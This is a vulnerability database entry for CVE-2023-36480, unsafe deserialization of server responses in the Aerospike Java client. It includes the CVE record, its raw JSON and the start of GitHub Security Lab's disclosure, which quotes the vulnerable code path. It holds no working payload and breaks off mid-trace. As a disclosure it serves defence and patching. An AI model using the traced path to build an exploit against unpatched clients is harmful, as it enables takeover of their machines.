CVE-2023-36480 (GCVE-0-2023-36480)

Vulnerability from cvelistv5 – Published: 2023-08-04 14:29 – Updated: 2024-10-17 14:59

Title

Aerospike Java Client vulnerable to unsafe deserialization of server responses

Summary

The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Prior to versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on. Versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 contain a patch for this issue.

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-502 - Deserialization of Untrusted Data

Assigner

GitHub_M

References

URL

Tags

	https://github.com/aerospike/aerospike-client-jav…	x_refsource_CONFIRM
	https://github.com/aerospike/aerospike-client-jav…	x_refsource_MISC
	https://github.com/aerospike/aerospike-client-jav…	x_refsource_MISC
	https://github.com/aerospike/aerospike-client-jav…	x_refsource_MISC
	https://github.com/aerospike/aerospike-client-jav…	x_refsource_MISC
	https://github.com/aerospike/aerospike-client-jav…	x_refsource_MISC
	https://github.com/aerospike/aerospike-client-jav…	x_refsource_MISC
	https://github.com/aerospike/aerospike-client-jav…	x_refsource_MISC
	https://github.com/aerospike/aerospike-client-jav…	x_refsource_MISC
	https://github.com/aerospike/aerospike-client-jav…	x_refsource_MISC
	https://github.com/aerospike/aerospike-client-jav…	x_refsource_MISC
	https://github.com/aerospike/aerospike-client-jav…	x_refsource_MISC
	https://support.aerospike.com/s/article/CVE-2023-…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	aerospike	aerospike-client-java	Affected: >= 6.0.0, < 6.2.0 Affected: >= 5.0.0, < 5.2.0 Affected: < 4.5.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T16:45:57.116Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083"
          },
          {
            "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227"
          },
          {
            "name": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-36480",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-17T14:59:51.407249Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-17T14:59:59.067Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "aerospike-client-java",
          "vendor": "aerospike",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 6.0.0, \u003c 6.2.0"
            },
            {
              "status": "affected",
              "version": "\u003e= 5.0.0, \u003c 5.2.0"
            },
            {
              "status": "affected",
              "version": "\u003c 4.5.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Prior to versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on. Versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 contain a patch for this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-08-08T14:53:39.538Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597"
        },
        {
          "name": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a"
        },
        {
          "name": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae"
        },
        {
          "name": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36"
        },
        {
          "name": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900"
        },
        {
          "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68"
        },
        {
          "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157"
        },
        {
          "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489"
        },
        {
          "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596"
        },
        {
          "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53"
        },
        {
          "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083"
        },
        {
          "name": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227"
        },
        {
          "name": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses"
        }
      ],
      "source": {
        "advisory": "GHSA-jj95-55cr-9597",
        "discovery": "UNKNOWN"
      },
      "title": "Aerospike Java Client vulnerable to unsafe deserialization of server responses"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-36480",
    "datePublished": "2023-08-04T14:29:34.806Z",
    "dateReserved": "2023-06-21T18:50:41.705Z",
    "dateUpdated": "2024-10-17T14:59:59.067Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597\", \"name\": \"https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a\", \"name\": \"https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae\", \"name\": \"https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36\", \"name\": \"https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900\", \"name\": \"https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses\", \"name\": \"https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T16:45:57.116Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-36480\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-10-17T14:59:51.407249Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-10-17T14:59:54.804Z\"}}], \"cna\": {\"title\": \"Aerospike Java Client vulnerable to unsafe deserialization of server responses\", \"source\": {\"advisory\": \"GHSA-jj95-55cr-9597\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"aerospike\", \"product\": \"aerospike-client-java\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 6.0.0, \u003c 6.2.0\"}, {\"status\": \"affected\", \"version\": \"\u003e= 5.0.0, \u003c 5.2.0\"}, {\"status\": \"affected\", \"version\": \"\u003c 4.5.0\"}]}], \"references\": [{\"url\": \"https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597\", \"name\": \"https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a\", \"name\": \"https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae\", \"name\": \"https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36\", \"name\": \"https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900\", \"name\": \"https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227\", \"name\": \"https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses\", \"name\": \"https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Prior to versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on. Versions 7.0.0, 6.2.0, 5.2.0, and 4.5.0 contain a patch for this issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2023-08-08T14:53:39.538Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2023-36480\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-10-17T14:59:59.067Z\", \"dateReserved\": \"2023-06-21T18:50:41.705Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2023-08-04T14:29:34.806Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-JJ95-55CR-9597

Vulnerability from github – Published: 2023-08-03 19:45 – Updated: 2023-08-08 22:15

Summary

Aerospike Java Client vulnerable to unsafe deserialization of server responses

Details

GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2023-044`

The GitHub Security Lab team has identified a potential security vulnerability in Aerospike Java Client.

We are committed to working with you to help resolve this issue. In this report you will find everything you need to effectively coordinate a resolution of this issue with the GHSL team.

If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at securitylab@github.com (please include GHSL-2023-044 as a reference).

If you are NOT the correct point of contact for this report, please let us know!

Summary

The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on.

Product

Aerospike Java Client

Tested Version

6.1.7

Details

Issue: Unsafe deserialization of server responses (`GHSL-2023-044`)

The Aerospike Java client implements different ways of communicating with an Aerospike server to perform several operations. Asynchronous commands can be executed using the Netty framework using the NettyCommand class. This class includes an InboundHandler that extends Netty's ChannelInboundHandlerAdapter, which handles inbound data coming from the Netty channel established with the server. This is implemented in the channelRead method:

client/src/com/aerospike/client/async/NettyCommand.java:1157

@Override
public void channelRead(ChannelHandlerContext ctx, Object msg) {
    command.read((ByteBuf)msg);
}

The incoming msg object is handled by the NettyCommand.read method, which behaves differently depending on the state variable. Several states produce paths to the vulnerable code — for instance, we will follow the path through AsyncCommand.COMMAND_READ_HEADER:

/client/src/com/aerospike/client/async/NettyCommand.java:489

private void read(ByteBuf byteBuffer) {
    eventReceived = true;

    try {
        switch (state) {
            // --snip--
            case AsyncCommand.COMMAND_READ_HEADER:
                if (command.isSingle) {
                    readSingleHeader(byteBuffer);
                }
                // --snip--
        }
        // --snip--
    }
    // --snip---
}

Some bytes are read from the message buffer and saved in command.dataBuffer in the readSingleHeader method, after which parseSingleBody is called:

client/src/com/aerospike/client/async/NettyCommand.java:596

private void readSingleHeader(ByteBuf byteBuffer) {
    int readableBytes = byteBuffer.readableBytes();
    int dataSize = command.dataOffset + readableBytes;

    // --snip--

    byteBuffer.readBytes(command.dataBuffer, 0, dataSize);
    command.dataOffset = dataSize;

    if (command.dataOffset >= receiveSize) {
        parseSingleBody();
    }
}

parseSingleBody simply delegates on AsyncCommand.parseCommandResult, which unless the message is compressed, directly calls AsyncCommand.parseResult. The implementation of this method depends on the command type. For an AsyncRead command, we have the following:

client/src/com/aerospike/client/async/AsyncRead.java:68

@Override
protected final boolean parseResult() {
    validateHeaderSize();

    int resultCode = dataBuffer[dataOffset + 5] & 0xFF;
    int generation = Buffer.bytesToInt(dataBuffer, dataOffset + 6);
    int expiration = Buffer.bytesToInt(dataBuffer, dataOffset + 10);
    int fieldCount = Buffer.bytesToShort(dataBuffer, dataOffset + 18);
    int opCount = Buffer.bytesToShort(dataBuffer, dataOffset + 20);
    dataOffset += Command.MSG_REMAINING_HEADER_SIZE;

    if (resultCode == 0) {
        // --snip--
        skipKey(fieldCount);
        record = parseRecord(opCount, generation, expiration, isOperation);
